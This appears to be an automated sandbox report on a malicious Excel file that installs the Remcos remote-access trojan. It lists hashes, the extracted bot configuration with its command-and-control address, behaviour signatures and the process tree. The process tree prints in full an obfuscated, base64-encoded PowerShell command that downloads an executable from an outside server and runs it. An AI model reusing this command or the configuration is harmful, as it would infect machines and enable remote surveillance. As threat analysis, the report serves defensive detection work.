remcos | bbfa2653ffb918121ecb6457991267689d3802e2afcbba498f0e3ef0e6740a96

Analysis

max time kernel
149s
max time network
146s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
28/08/2024, 02:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbfa2653ffb918121ecb6457991267689d3802e2afcbba498f0e3ef0e6740a96.xls
Size

547KB
MD5

560b9bdb75835822ed9f84d46521fd38
SHA1

e68f1783002016aabecfd74ef333b90be19262ac
SHA256

bbfa2653ffb918121ecb6457991267689d3802e2afcbba498f0e3ef0e6740a96
SHA512

55f533cc57c8379de0c5227ccef9e237ad512844dfde30d112b6b86932f9024cae30de0dcd57a12abf8819174e6319ccc2fb4493df773360021e3afd9c49dd83
SSDEEP

12288:WI1GWVjZScJbyWKEVuqg2/6VnDIh7xOP1fJYWe/egIY4Fg3lh:WCrjZsWKElYnvtfw/ed

Score

10^/10

remcos remotehost defense_evasion discovery evasion execution persistence rat themida trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

192.3.101.172:9674

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
Log
keylog_path
%Temp%
mouse_option
false
mutex
Rmc-54ZTI0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	jhl_service.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2904	mshta.exe
13	2904	mshta.exe
15	1664	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1664	powershell.exe
3044	cmd.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jhl_service.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	jhl_service.exe

Executes dropped EXE 31 IoCs

pid	Process
1908	jhl_service.exe
1128	jhl_service.exe
2592	jhl_service.exe
988	jhl_service.exe
1236	jhl_service.exe
292	jhl_service.exe
1520	jhl_service.exe
1960	jhl_service.exe
1648	jhl_service.exe
2272	jhl_service.exe
2688	jhl_service.exe
1628	jhl_service.exe
884	jhl_service.exe
2100	jhl_service.exe
1692	jhl_service.exe
2884	jhl_service.exe
2968	jhl_service.exe
1492	jhl_service.exe
2672	jhl_service.exe
2724	jhl_service.exe
876	jhl_service.exe
2156	jhl_service.exe
780	jhl_service.exe
2716	jhl_service.exe
1344	jhl_service.exe
1392	jhl_service.exe
1696	jhl_service.exe
1080	jhl_service.exe
2084	jhl_service.exe
1144	jhl_service.exe
1756	jhl_service.exe

Loads dropped DLL 2 IoCs

pid	Process
1664	powershell.exe
1908	jhl_service.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0006000000019c53-56.dat	themida
behavioral1/memory/1908-81-0x0000000000130000-0x0000000000A92000-memory.dmp	themida
behavioral1/memory/1908-82-0x0000000000130000-0x0000000000A92000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\Users\\Admin\\AppData\\Roaming\\jhl_service.exe"	jhl_service.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jhl_service.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1908	jhl_service.exe

Suspicious use of SetThreadContext 30 IoCs

description	pid	Process	procid_target
PID 1908 set thread context of 1128	1908	jhl_service.exe	40
PID 1908 set thread context of 2592	1908	jhl_service.exe	41
PID 1908 set thread context of 988	1908	jhl_service.exe	42
PID 1908 set thread context of 1236	1908	jhl_service.exe	44
PID 1908 set thread context of 292	1908	jhl_service.exe	45
PID 1908 set thread context of 1520	1908	jhl_service.exe	46
PID 1908 set thread context of 1960	1908	jhl_service.exe	47
PID 1908 set thread context of 1648	1908	jhl_service.exe	48
PID 1908 set thread context of 2272	1908	jhl_service.exe	49
PID 1908 set thread context of 2688	1908	jhl_service.exe	50
PID 1908 set thread context of 1628	1908	jhl_service.exe	51
PID 1908 set thread context of 884	1908	jhl_service.exe	52
PID 1908 set thread context of 2100	1908	jhl_service.exe	53
PID 1908 set thread context of 1692	1908	jhl_service.exe	54
PID 1908 set thread context of 2884	1908	jhl_service.exe	55
PID 1908 set thread context of 2968	1908	jhl_service.exe	56
PID 1908 set thread context of 1492	1908	jhl_service.exe	57
PID 1908 set thread context of 2672	1908	jhl_service.exe	58
PID 1908 set thread context of 2724	1908	jhl_service.exe	59
PID 1908 set thread context of 876	1908	jhl_service.exe	60
PID 1908 set thread context of 2156	1908	jhl_service.exe	61
PID 1908 set thread context of 780	1908	jhl_service.exe	62
PID 1908 set thread context of 2716	1908	jhl_service.exe	63
PID 1908 set thread context of 1344	1908	jhl_service.exe	64
PID 1908 set thread context of 1392	1908	jhl_service.exe	65
PID 1908 set thread context of 1696	1908	jhl_service.exe	66
PID 1908 set thread context of 1080	1908	jhl_service.exe	67
PID 1908 set thread context of 2084	1908	jhl_service.exe	68
PID 1908 set thread context of 1144	1908	jhl_service.exe	69
PID 1908 set thread context of 1756	1908	jhl_service.exe	70

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jhl_service.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2296	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe

Suspicious behavior: MapViewOfSection 30 IoCs

pid	Process
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe
1908	jhl_service.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1664	powershell.exe

Suspicious use of SetWindowsHookEx 46 IoCs

pid	Process
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
1908	jhl_service.exe
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE
2296	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 3044	2904	mshta.exe	33
PID 2904 wrote to memory of 3044	2904	mshta.exe	33
PID 2904 wrote to memory of 3044	2904	mshta.exe	33
PID 2904 wrote to memory of 3044	2904	mshta.exe	33
PID 3044 wrote to memory of 1664	3044	cmd.exe	35
PID 3044 wrote to memory of 1664	3044	cmd.exe	35
PID 3044 wrote to memory of 1664	3044	cmd.exe	35
PID 3044 wrote to memory of 1664	3044	cmd.exe	35
PID 1664 wrote to memory of 1272	1664	powershell.exe	36
PID 1664 wrote to memory of 1272	1664	powershell.exe	36
PID 1664 wrote to memory of 1272	1664	powershell.exe	36
PID 1664 wrote to memory of 1272	1664	powershell.exe	36
PID 1272 wrote to memory of 1988	1272	csc.exe	37
PID 1272 wrote to memory of 1988	1272	csc.exe	37
PID 1272 wrote to memory of 1988	1272	csc.exe	37
PID 1272 wrote to memory of 1988	1272	csc.exe	37
PID 1664 wrote to memory of 1908	1664	powershell.exe	39
PID 1664 wrote to memory of 1908	1664	powershell.exe	39
PID 1664 wrote to memory of 1908	1664	powershell.exe	39
PID 1664 wrote to memory of 1908	1664	powershell.exe	39
PID 1908 wrote to memory of 1128	1908	jhl_service.exe	40
PID 1908 wrote to memory of 1128	1908	jhl_service.exe	40
PID 1908 wrote to memory of 1128	1908	jhl_service.exe	40
PID 1908 wrote to memory of 1128	1908	jhl_service.exe	40
PID 1908 wrote to memory of 1128	1908	jhl_service.exe	40
PID 1908 wrote to memory of 2592	1908	jhl_service.exe	41
PID 1908 wrote to memory of 2592	1908	jhl_service.exe	41
PID 1908 wrote to memory of 2592	1908	jhl_service.exe	41
PID 1908 wrote to memory of 2592	1908	jhl_service.exe	41
PID 1908 wrote to memory of 2592	1908	jhl_service.exe	41
PID 1908 wrote to memory of 988	1908	jhl_service.exe	42
PID 1908 wrote to memory of 988	1908	jhl_service.exe	42
PID 1908 wrote to memory of 988	1908	jhl_service.exe	42
PID 1908 wrote to memory of 988	1908	jhl_service.exe	42
PID 1908 wrote to memory of 988	1908	jhl_service.exe	42
PID 1908 wrote to memory of 1236	1908	jhl_service.exe	44
PID 1908 wrote to memory of 1236	1908	jhl_service.exe	44
PID 1908 wrote to memory of 1236	1908	jhl_service.exe	44
PID 1908 wrote to memory of 1236	1908	jhl_service.exe	44
PID 1908 wrote to memory of 1236	1908	jhl_service.exe	44
PID 1908 wrote to memory of 292	1908	jhl_service.exe	45
PID 1908 wrote to memory of 292	1908	jhl_service.exe	45
PID 1908 wrote to memory of 292	1908	jhl_service.exe	45
PID 1908 wrote to memory of 292	1908	jhl_service.exe	45
PID 1908 wrote to memory of 292	1908	jhl_service.exe	45
PID 1908 wrote to memory of 1520	1908	jhl_service.exe	46
PID 1908 wrote to memory of 1520	1908	jhl_service.exe	46
PID 1908 wrote to memory of 1520	1908	jhl_service.exe	46
PID 1908 wrote to memory of 1520	1908	jhl_service.exe	46
PID 1908 wrote to memory of 1520	1908	jhl_service.exe	46
PID 1908 wrote to memory of 1960	1908	jhl_service.exe	47
PID 1908 wrote to memory of 1960	1908	jhl_service.exe	47
PID 1908 wrote to memory of 1960	1908	jhl_service.exe	47
PID 1908 wrote to memory of 1960	1908	jhl_service.exe	47
PID 1908 wrote to memory of 1960	1908	jhl_service.exe	47
PID 1908 wrote to memory of 1648	1908	jhl_service.exe	48
PID 1908 wrote to memory of 1648	1908	jhl_service.exe	48
PID 1908 wrote to memory of 1648	1908	jhl_service.exe	48
PID 1908 wrote to memory of 1648	1908	jhl_service.exe	48
PID 1908 wrote to memory of 1648	1908	jhl_service.exe	48
PID 1908 wrote to memory of 2272	1908	jhl_service.exe	49
PID 1908 wrote to memory of 2272	1908	jhl_service.exe	49
PID 1908 wrote to memory of 2272	1908	jhl_service.exe	49
PID 1908 wrote to memory of 2272	1908	jhl_service.exe	49

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bbfa2653ffb918121ecb6457991267689d3802e2afcbba498f0e3ef0e6740a96.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2296

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C powersheLL.EXE -ex BYpasS -nOP -W 1 -c DevICeCREdEnTiALdePloymeNt ; Iex($(Iex('[SySTEm.tEXt.ENcODInG]'+[Char]0x3A+[char]0X3a+'Utf8.GetsTriNg([SYsTeM.COnVErT]'+[cHaR]58+[char]0x3a+'froMBaSe64STriNG('+[CHar]34+'JEZ4MEhSUXFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUkRFRkluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENxaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGRCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN2TnB6aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0YixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpUam1iWU10QmJkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtJQlJpSG9ST24iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVdHFQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRngwSFJRcU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODEuMjI1LzQwMC9qaGxfc2VydmljZS5leGUiLCIkRW5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIiwwLDApO1N0QVJ0LVNMZWVwKDMpO1NUYVJ0LVBSb2NFU1MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIg=='+[Char]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powersheLL.EXE -ex BYpasS -nOP -W 1 -c DevICeCREdEnTiALdePloymeNt ; Iex($(Iex('[SySTEm.tEXt.ENcODInG]'+[Char]0x3A+[char]0X3a+'Utf8.GetsTriNg([SYsTeM.COnVErT]'+[cHaR]58+[char]0x3a+'froMBaSe64STriNG('+[CHar]34+'JEZ4MEhSUXFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUkRFRkluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENxaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGRCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN2TnB6aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0YixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpUam1iWU10QmJkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtJQlJpSG9ST24iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVdHFQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRngwSFJRcU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODEuMjI1LzQwMC9qaGxfc2VydmljZS5leGUiLCIkRW5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIiwwLDApO1N0QVJ0LVNMZWVwKDMpO1NUYVJ0LVBSb2NFU1MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcamhsX3NlcnZpY2UuZXhlIg=='+[Char]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rqgaxc-9.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1272
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBA7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEBA6.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1988
  - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
      "C:\Users\Admin\AppData\Roaming\jhl_service.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1908
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\orcogrkpepsxcaxsamowoehltmnrumb"
        5⤵
        Executes dropped EXE
        
        PID:1128
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\ythzhkursxkcmplwkxbpzjcubtfavxarlt"
        5⤵
        Executes dropped EXE
        
        PID:2592
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\jnvshcf"
        5⤵
        Executes dropped EXE
        
        PID:988
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\dcjjmbzwubhaawdguubksxalnl"
        5⤵
        Executes dropped EXE
        
        PID:1236
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\gwocetkxijznlczklfwldkvcwrleqg"
        5⤵
        Executes dropped EXE
        
        PID:292
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\qybmfmvrdsrsnqnovpjffopleyufjjstb"
        5⤵
        Executes dropped EXE
        
        PID:1520
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\vicwclaefwnqjxogfejzgcocq"
        5⤵
        Executes dropped EXE
        
        PID:1960
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkipdwlytefdmdckppwtrpitzwaj"
        5⤵
        Executes dropped EXE
        
        PID:1648
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\ienheovzhmxiwsyogaruuudchdrsfel"
        5⤵
        Executes dropped EXE
        
        PID:2272
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\ctjzavilujcbilvuhmxn"
        5⤵
        Executes dropped EXE
        
        PID:2688
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\mnojbnseqrugkzryqxjpuib"
        5⤵
        Executes dropped EXE
        
        PID:1628
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppuccglgezmlvffkaieixvwjcb"
        5⤵
        Executes dropped EXE
        
        PID:884
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\uzvmzxilgeirjmgukx"
        5⤵
        Executes dropped EXE
        
        PID:2100
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\etafzptnumawtauybhrfj"
        5⤵
        Executes dropped EXE
        
        PID:1692
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\hvnpaiegqcsawgqclseymsjaf"
        5⤵
        Executes dropped EXE
        
        PID:2884
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\bcbhxgysdzwuh"
        5⤵
        Executes dropped EXE
        
        PID:2968
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\lepzxzjtrhohsnimv"
        5⤵
        Executes dropped EXE
        
        PID:1492
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\wyusyrunfphlucxymazm"
        5⤵
        Executes dropped EXE
        
        PID:2672
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\tpvcvizahtdk"
        5⤵
        Executes dropped EXE
        
        PID:2724
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\dkamwbjudcvwtpl"
        5⤵
        Executes dropped EXE
        
        PID:876
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\nmgfxtuvrknbddhqxk"
        5⤵
        Executes dropped EXE
        
        PID:2156
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\itcwtag"
        5⤵
        Executes dropped EXE
        
        PID:780
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\kvhpukrbso"
        5⤵
        Executes dropped EXE
        
        PID:2716
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\vpmaudkcgwbmc"
        5⤵
        Executes dropped EXE
        
        PID:1344
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\peizrkwoutgyortsswbjxsbyhlyqyvplk"
        5⤵
        Executes dropped EXE
        
        PID:1392
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\aynks"
        5⤵
        Executes dropped EXE
        
        PID:1696
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\kbtcsvsj"
        5⤵
        Executes dropped EXE
        
        PID:1080
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\hkumpmxofomnptvkdpjylxppkqnvlih"
        5⤵
        Executes dropped EXE
        
        PID:2084
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\rehx"
        5⤵
        Executes dropped EXE
        
        PID:1144
    - - C:\Users\Admin\AppData\Roaming\jhl_service.exe
        
        C:\Users\Admin\AppData\Roaming\jhl_service.exe /stext "C:\Users\Admin\AppData\Local\Temp\cgnprxs"
        5⤵
        Executes dropped EXE
        
        PID:1756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

